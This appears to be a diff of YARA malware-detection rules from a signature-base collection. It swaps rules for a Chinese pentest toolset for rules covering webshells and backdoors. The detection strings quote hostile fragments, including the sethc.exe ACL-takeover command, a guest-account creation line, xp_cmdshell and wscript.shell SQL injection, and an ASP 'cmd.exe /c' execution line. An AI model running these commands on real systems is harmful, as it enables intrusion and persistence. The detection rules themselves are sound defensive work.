-		id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1428-L1446"
+		id = "978fb04e-517d-51cf-98ca-5fd6b421365e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7626-L7640"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0783661077312753802bd64bf5d35c4666ad0a82"
-		logic_hash = "85c73d480019929eef5951b0395f49cea86dc83b334860e940cc6e36c2d96d3a"
-		score = 70
+		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
+		logic_hash = "927ed5cdaa14b6cd63a6ca7d7bec6635b69fa19d88808890e7d198fb7a0b57b4"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "F4ck.exe" fullword wide
-		$s2 = "@Netapi32.dll" fullword ascii
-		$s3 = "Team.F4ck.Net" fullword wide
-		$s8 = "Administrators" fullword ascii
-		$s9 = "F4ck Team" fullword wide
+		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
+		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_80_Antifw : FILE
+rule SIGNATURE_BASE_Dllinjection
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
+		description = "Webshells Auto-generated - file DllInjection.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "761bed41-e8e6-585b-8fde-a6b6a56445d6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1448-L1466"
+		id = "8a57e122-fd00-57f3-94db-736c5bfd76db"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7641-L7652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5fbc75900e48f83d0e3592ea9fa4b70da72ccaa3"
-		logic_hash = "5e940406b713458ae7168d4e140f15a262b7f0834d29db9c88f1f04bedb41e43"
-		score = 70
+		hash = "a7b92283a5102886ab8aee2bc5c8d718"
+		logic_hash = "6e01ae1cc8a91a5e0d22bdf477aa72bf0116dbe31752a069b1e34d8a09ec6213"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Set TS to port:80 Successfully!" fullword ascii
-		$s2 = "Now,set TS to port 80" fullword ascii
-		$s3 = "echo. >>amethyst.reg" fullword ascii
-		$s4 = "del amethyst.reg" fullword ascii
-		$s5 = "AntiFW.cpp" fullword ascii
+		$s0 = "\\BDoor\\DllInjecti"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Wwwscan_Gui : FILE
+rule SIGNATURE_BASE_Mithril_V1_45_Mithril
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
+		description = "Webshells Auto-generated - file Mithril.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fffed806-4394-505a-96bd-50bf6f24aefc"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1468-L1483"
+		id = "3c160017-0332-532a-bb7f-390a4a34dc4e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7653-L7665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
-		logic_hash = "9c25cf33fc2f675c8db7b24f2abe03d54c0ae17927e0ca9ccd3e5b97ffc56f73"
-		score = 70
+		hash = "f1484f882dc381dde6eaa0b80ef64a07"
+		logic_hash = "a3e74bfb34762553eccaddd745d9e17dc3a5a25201e4bc9e2ea9a49342295c78"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
-		$s2 = "/eye2007Admin_login.aspx" fullword ascii
+		$s2 = "cress.exe"
+		$s7 = "\\Debug\\Mithril."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 280KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Swordcolledition : FILE
+rule SIGNATURE_BASE_Hkshell_Hkrmv
 {
-	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e8d4d48-c053-5579-be9c-af73ec0fe614"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1485-L1500"
+	meta:
+		description = "Webshells Auto-generated - file hkrmv.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "986fad12-9198-5e0a-88d6-a9be6963ff8c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7666-L7678"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6e14f21cac6e2aa7535e45d81e8d1f6913fd6e8b"
-		logic_hash = "bbc5c9bb91bdd60582e2d7f6fa9b1a1cc3799e0809b670d575d9b2c77bf5e884"
-		score = 70
+		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
+		logic_hash = "f1da0778456272e6d93633a564018bdf0fa74f1db1c9e963a03a59c69c752b6e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "YuJianScan.exe" fullword wide
-		$s1 = "YuJianScan" fullword ascii
+		$s5 = "/THUMBPOSITION7"
+		$s6 = "\\EvilBlade\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 225KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Hconstfportable : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
+		description = "Webshells Auto-generated - file phpshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1502-L1517"
+		id = "d0107af3-e484-54cf-a238-dd1e71efd3f6"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "phpshell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7679-L7693"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
-		logic_hash = "d4368994d38b87a4c0a53321a468fa8a72411ccb17befa0bbc62bdd6de9e1a52"
-		score = 70
+		hash = "1dccb1ea9f24ffbd085571c88585517b"
+		logic_hash = "eed450ae6668bbee01ea2689e9864f10a66714ec4c91afabb12609ad4ebdac8c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "HconSTFportable.exe" fullword wide
-		$s2 = "www.Hcon.in" fullword wide
+		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
+		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
+		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 354KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_LPK : FILE
+rule SIGNATURE_BASE_FSO_S_Cmd
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
+		description = "Webshells Auto-generated - file cmd.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5b806d9-74dc-5244-b1e0-9837abeaeaac"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1519-L1536"
+		id = "f7a74f21-aec9-5ee7-a80e-0fe34b977a71"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7694-L7706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
-		logic_hash = "20e949bef1c1631ef2a48c78c2ccc4dcea2f842275ec5df3e31c5d915e8a2a04"
-		score = 70
+		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
+		logic_hash = "43f3379a57210f0e3b70575313115a7ba3d71359de7c5ac9a6a178b93af3545e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "FreeHostKillexe.exe" fullword ascii
-		$s2 = "\\sethc.exe /G everyone:F" ascii
-		$s3 = "c:\\1.exe" fullword ascii
-		$s4 = "Set user Group Error! Username:" fullword ascii
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
+		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Without_A_Trace_Wywz : FILE
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Phpft
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Wywz.exe"
+		description = "Webshells Auto-generated - file phpft.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1093c0c3-499f-5aec-ad4a-878d377296d5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1538-L1554"
+		id = "00bc690b-4977-5076-a40a-edd39c37233f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7707-L7719"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f443c43fde643228ee95def5c8ed3171f16daad8"
-		logic_hash = "0f6ca7d44312afef49d3094af7b33af5e41f4531e7e7f9f37cf050700755bb3e"
-		score = 70
+		hash = "60ef80175fcc6a879ca57c54226646b1"
+		logic_hash = "741536acafdc4da618d69bdae2f0a3e8c004a4027cc76c796158ee111c006414"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Symantec\\Norton Personal Firewall\\Log\\Content.log" ascii
-		$s2 = "UpdateFile=d:\\tool\\config.ini,Option\\\\proxyIp=127.0.0.1\\r\\nproxyPort=808" ascii
-		$s3 = "%s\\subinacl.exe /subkeyreg \"%s\" /Grant=%s=f /Grant=everyone=f" fullword ascii
+		$s6 = "PHP Files Thief"
+		$s11 = "http://www.4ngel.net"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1800KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_LPK2_0_LPK : FILE
+rule SIGNATURE_BASE_FSO_S_Indexer
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
+		description = "Webshells Auto-generated - file indexer.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1556-L1573"
+		id = "fba053d7-5413-563f-8c27-0554349500b2"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7720-L7731"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
-		logic_hash = "d693b880d5419277d9189d44ace60fe5f328b4662c1975a8bc97e63dc073d1e6"
-		score = 70
+		hash = "135fc50f85228691b401848caef3be9e"
+		logic_hash = "a1bfba9c24819f5c1574aa179d853a6cc2fcf58c7b9a14eeab2639248178549c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\sethc.exe /G everyone:F" ascii
-		$s2 = "net1 user guest guest123!@#" fullword ascii
-		$s3 = "\\dllcache\\sethc.exe" ascii
-		$s4 = "sathc.exe 211" fullword ascii
+		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1030KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cleaniis : FILE
+rule SIGNATURE_BASE_R57Shell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
+		description = "Webshells Auto-generated - file r57shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75f3c33a-e3b8-57bc-a3fd-f8b6491388d8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1575-L1590"
+		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7732-L7743"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "372bc64c842f6ff0d9a1aa2a2a44659d8b88cb40"
-		logic_hash = "6f3fe22c9ce8b576116a3fc185910488f37b687c1158d49a93feaa68a144a8db"
-		score = 70
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+		logic_hash = "40ff6bceb3f9bd95fbf5e75681fadadaa64243007e10fcc86bb909282b8161c5"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii
-		$s4 = "IIS log file cleaner by Scurt" fullword ascii
+		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Arp3_7_Arp3_7 : FILE
+rule SIGNATURE_BASE_Bdcli100
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
+		description = "Webshells Auto-generated - file bdcli100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4aeefaf-a097-5ba3-a18f-54a1b9752883"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1592-L1607"
+		id = "c74e8822-9556-5596-a130-c6e0120d7103"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7744-L7756"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "db641a9dfec103b98548ac7f6ca474715040f25c"
-		logic_hash = "9930d5f13c4dc5cae25dece811911e71e858e3fef51a09c99883699e7feb4908"
-		score = 70
+		hash = "b12163ac53789fb4f62e4f17a8c2e028"
+		logic_hash = "48c70413c71d5a84f8cea48c77935b7cc26d9e1348d7ab257de4540d69f0f817"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "CnCerT.Net.SKiller.exe" fullword wide
-		$s2 = "www.80sec.com" fullword wide
+		$s5 = "unable to connect to "
+		$s8 = "backdoor is corrupted on "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Ms11080 : FILE
+rule SIGNATURE_BASE_Hytop_Devpack_2005Red
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
+		description = "Webshells Auto-generated - file 2005Red.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f5ce2f3-3595-5729-be0c-3f6486cb94fd"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1609-L1624"
+		id = "963effd9-f31d-5238-9419-b5dd11822e56"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7757-L7770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
-		logic_hash = "57eb1cdd1108c82da399b0aa869edc9e377e0185896504716bec8925599c07f0"
-		score = 70
+		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
+		logic_hash = "716b6faa8d1216f592d63b658cdd65d7be0226bf746b5fdf1827bdf881562711"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "[*] command add user 90sec 90sec" fullword ascii
-		$s6 = "[*] Add to Administrators success" fullword ascii
+		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
+		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 840KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Injection_Transit : FILE
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
+		description = "Webshells Auto-generated - file 2006X2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1626-L1642"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7771-L7783"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
-		logic_hash = "3e6fe804b9b6e8555c847a165bb0a8b266004653531fe8f11e3937108757f2ff"
-		score = 70
+		hash = "cc5bf9fc56d404ebbc492855393d7620"
+		logic_hash = "0df587ccaf41d11c6be90ef631ce8b21f95f08fa8f71e62463c378455b312f4a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<description>Your app description here</description> " fullword ascii
-		$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide
-		$s5 = "ScriptnackgBun" fullword ascii
+		$s2 = "Powered By "
+		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3175KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Safe3Wvs : FILE
+rule SIGNATURE_BASE_Rdrbs084
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Safe3WVS.EXE"
+		description = "Webshells Auto-generated - file rdrbs084.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "035ecb73-3dbc-55d2-8d0c-b71308094d18"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1644-L1662"
+		id = "97548273-6894-5c9f-8cca-d966ce770ada"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7784-L7796"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fee3acacc763dc55df1373709a666d94c9364a7f"
-		logic_hash = "803591fa9427c3001f78ae6274076f3a2f070770d568909d6cba8cee5124ee4c"
-		score = 70
+		hash = "ed30327b255816bdd7590bf891aa0020"
+		logic_hash = "8a743d62723c4a5f863f986edd4b149728680b40d6a4b9a99b093d62ccb70cf8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "2TerminateProcess" fullword ascii
-		$s1 = "mscoreei.dll" fullword ascii
-		$s7 = "SafeVS.exe" fullword wide
-		$s8 = "www.safe3.com.cn" fullword wide
-		$s20 = "SOFTWARE\\Classes\\Interface\\" ascii
+		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
+		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_NBSI_3_0 : FILE
+rule SIGNATURE_BASE_Hytop_Caseswitch_2005
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
+		description = "Webshells Auto-generated - file 2005.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1664-L1681"
+		id = "0f2b8e71-1c11-5efe-bee7-146168aec369"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7797-L7815"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
-		logic_hash = "017b5f76a3168089f3186134e7a4c0352158bb866228776240f0d014834e6ee0"
-		score = 70
-		quality = 60
-		tags = "FILE"
+		hash = "8bf667ee9e21366bc0bd3491cb614f41"
+		logic_hash = "0ecf28b5abb918cd1d8f38b76019dddf19dff5dbb114f16ef6ec9b46cb590a46"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
-		$s2 = "http://localhost/1.asp?id=16" fullword ascii
-		$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide
-		$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
+		$s1 = "MSComDlg.CommonDialog"
+		$s2 = "CommonDialog1"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s5 = "EVENT_SINK_AddRef"
+		$s6 = "By Marcos"
+		$s7 = "EVENT_SINK_QueryInterface"
+		$s8 = "MethCallEngine"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2600KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_2_0 : FILE
+rule SIGNATURE_BASE_Ebayid_Index3
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
+		description = "Webshells Auto-generated - file index3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dda5eea9-da79-5f1f-bbac-9f05ba7e71c9"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1683-L1699"
+		id = "4fc30150-7b44-53c4-888c-faf651495407"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7816-L7827"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e8ee982421ccff96121ffd24a3d84e3079f3750f"
